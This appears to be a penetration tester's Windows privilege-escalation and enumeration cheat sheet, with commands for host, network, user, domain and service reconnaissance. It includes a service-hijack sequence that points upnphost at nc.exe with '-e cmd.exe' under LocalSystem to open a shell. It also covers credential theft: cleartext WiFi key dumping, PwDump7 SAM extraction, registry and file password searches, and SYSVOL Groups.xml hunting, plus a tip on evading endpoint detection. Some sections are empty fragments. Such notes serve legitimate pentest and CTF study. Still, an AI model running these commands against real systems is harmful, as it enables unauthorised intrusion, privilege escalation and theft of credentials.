Local Recon and Enumeration


# Powershell whoami

# Display hidden files
dir /a 

# Recursive dir
dir /s

# If you can't browse a folder because of space char
# You can use an old trick
# It has to be 8 chars 
cmd> cd progra~1
cmd> cd progra~2

Enumeration - Host Information

# Exact OS version
type C:/Windows/system32/eula.txt

type C:\Windows\System32\drivers\etc\hosts
# OS Arch
wmic qfe

# Envionment variables ? DC on the logon server ? 
powershell> Get-ChildItem Env: | ft Key,Value

# Other connecte drives ?
net use
wmic logicaldisk get caption,description,providername
powershell> Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

Enumeration - Network

# NIC Connected
ipconfig /all
powershell> Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
powershell> Get-DnsClientServerAddress -AddressFamily IPv4 | ft

# Routes
route print
powershell> Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

# ARP Cache
arp -a
powershell> Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

# Connection to other hosts
netstat -ano

# Hosts file

# Firewall
netsh advfirewall show allprofiles state
netsh advfirewall firewall show rule name=all
netsh advfirewall export "firewall.txt"

# Is SNMP configured ?
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
powershell> Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

Enumeration - Users & Groups

# SID for local user or logged in local user
wmic useraccount where name='username' get sid
wmic useraccount where name='%username%' get sid

# SID for current logged in domain user
whoami /user

# SID for local administrator
wmic useraccount where (name='administrator' and domain='%computername%') get name,sid

# SID for domain administrator
wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid

# Find a username from a SID
wmic useraccount where sid='S-1-3-12-1234525106-3567804255-30012867-1437' get name

# Looking for privileges and searching for one of these
# SeBackupPrivilege, SeDebugPrivilege, SeTakeOwnershipPrivilege, SeTcbPrivilege
# SeCreateToken Privilege, SeLoadDriver Privilege, SeImpersonate 
whoami /priv
net users
dir /b /ad “C:\Documents and Settings”
reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon” 2>nul | findstr “DefaultUserName DefaultDomainName DefaultPassword”
net user alice
echo %username%

# Get all users (old users?)
net users
dir /b /ad "C:\Users\"
dir /b /ad "C:\Documents and Settings\" # Windows XP and below
powershell> Get-LocalUser | ft Name,Enabled,LastLogon
powershell> Get-ChildItem C:\Users -Force | select Name

# Informations about all local users
powershell> Get-WmiObject  -Class Win32_UserAccount  -Filter "LocalAccount=1" | % {net user $_.Name}
powershell> Get-LocalUser | %{net user $_.name}

# Logged on users

# Groups
powershell> Get-LocalGroup | ft Name
powershell> Get-LocalGroupMember Administrators | ft Name, PrincipalSource

# Get domain
powershell> wmic computersystem get domain
powershell> systeminfo | findstr /B /C:"Domain"

# Domain
# /dom could be a way to avoid endpoint solutions detection
powershell> net user /dom
powershell> net user /domain
powershell> net user /domain <username>
powershell> net group /domain

# Get you own SID
powershell> wmic useraccount where name='<username>' get sid
# Registry for user autologon ?
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
powershell> Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"

# Credential Manager ? 
cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
powershell> Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
powershell> Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
# Get domain SPN
$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.filter = "(servicePrincipalName=*)"
$results = $search.Findall()
foreach($result in $results)
    $userEntry = $result.GetDirectoryEntry()
    Write-host "User : " $userEntry.name "(" $userEntry.distinguishedName ")"
    Write-host "SPNs"        
    foreach($SPN in $userEntry.servicePrincipalName)
    Write-host ""

# Get user accounts which have SPN
$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.filter = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$results = $search.Findall()
foreach($result in $results)
    $userEntry = $result.GetDirectoryEntry()
    Write-host "User : " $userEntry.name "(" $userEntry.distinguishedName ")"
    Write-host "SPNs"        
    foreach($SPN in $userEntry.servicePrincipalName)
    Write-host ""
# WMIC help
wmic /?

# patchlevel
wmic qfe get Caption,Description,HotFixID,InstalledOn
# Grep for particular patch
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

# Check typical files for passwords

# SYSVOL passwords... (msf or powersploit)
# Other files that can contain passwords

Enumeration - Programs, Processes and Services

tasklist /SVC
schtasks /query /fo LIST /v
net start
accesschk_old.exe -uwcqv “Authenticated Users” * /accepteula
accesschk_old.exe -ucqv upnphost
sc qc upnphost
sc config upnphost binpath= “C:\Windows\Temp\nc.exe -nv 51337 -e C:\Windows\System32\cmd.exe”
sc config upnphost obj= “.\LocalSystem” password= “”
net stop upnphost
net start upnphost

Installed Software and permissions

# Get installed software
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
powershell> Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
powershell> Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

# Full permissions for everyone or users ?
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"

# Also possible to do it using accesschk from sysinternals
accesschk.exe -qwsu "Everyone" *
accesschk.exe -qwsu "Authenticated Users" *
accesschk.exe -qwsu "Users" *

Processes and Services

# Get processes and services
tasklist /svc
tasklist /v
net start
sc query

powershell> Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
powershell> Get-Service
powershell> Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

# Weak and reocnfigurable services ?
accesschk.exe -uwcqv "Everyone" *
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users" *

# Service list, many output
wmic service list
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
# ANy Unquoted Service paths ? 
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
powershell> gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
# Scheduled Tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks
powershell> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
# Startup
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

powershell> Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
powershell> Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run'
powershell> Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce'
powershell> Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'
powershell> Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce'
powershell> Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
powershell> Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
# Dump process memory from PowerShell
# Powershell procdump

Enumeration - Files

dir /a /s *pass* == *cred* == *vnc* == *.config* == *proof.txt* == *local.txt*
findstr /si password *.xml *.ini *.txt *.config *.sql *.php *.asp *.jsp *.bat *.vbs 2>nul
type “C:\Documents and Settings\Administrator\Desktop\proof.txt”
# Passwords in the registry
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s 
# Unattended files or sysprep not cleaned ?
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
powershell> Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
# On IIS, what's in inetpub, web.config ?
dir /a C:\inetpub\
dir /s web.config
powershell> Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

# IIS logs
# XAMPP, Apache, or PHP, configuration files ? 
dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
powershell> Get-Childitem –Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue
# Interesting files ? 
dir /s *pass* == *vnc* == *.config* 2>nul
powershell> Get-Childitem –Path C:\Users\ -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue

# Files containing password ?
findstr /si password *.xml *.ini *.txt *.config 2>nul
powershell> Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"


# Group Policy Preference
# Output environment-variables

# Look for the following:

# Look up ip-addres
nslookup nameofserver.whatever.local

# It will output something like this

# Now we mount it
net use z: \\\SYSVOL

# And enter it

# Now we search for the groups.xml file
dir Groups.xml /s

Gathering Passwords/Hashes

reg query "HKCU\Software\ORL\WinVNC3\Password"

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# SNMP Paramters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
# You can find passwords in arbitrary files
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

# Find all passwords in all files
findstr /spin "password" *.*

# Some common files to find them in
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

# Stuff in the registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

# Search for passwords in the registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# searhc for files containing keywoards
dir /s *pass* == *cred* == *vnc* == *.config*

# Interesting files
# Enumerate stored WiFi settings and get possible stored passwords
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "(Key Content|Contenu de la clé)\W+\:(.+)$" | %{$pass=$_.Matches.Groups[2].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
.\PwDump7.exe (nécessite libay32.dll) => Dump SAM base
# SAM and SYSTEM files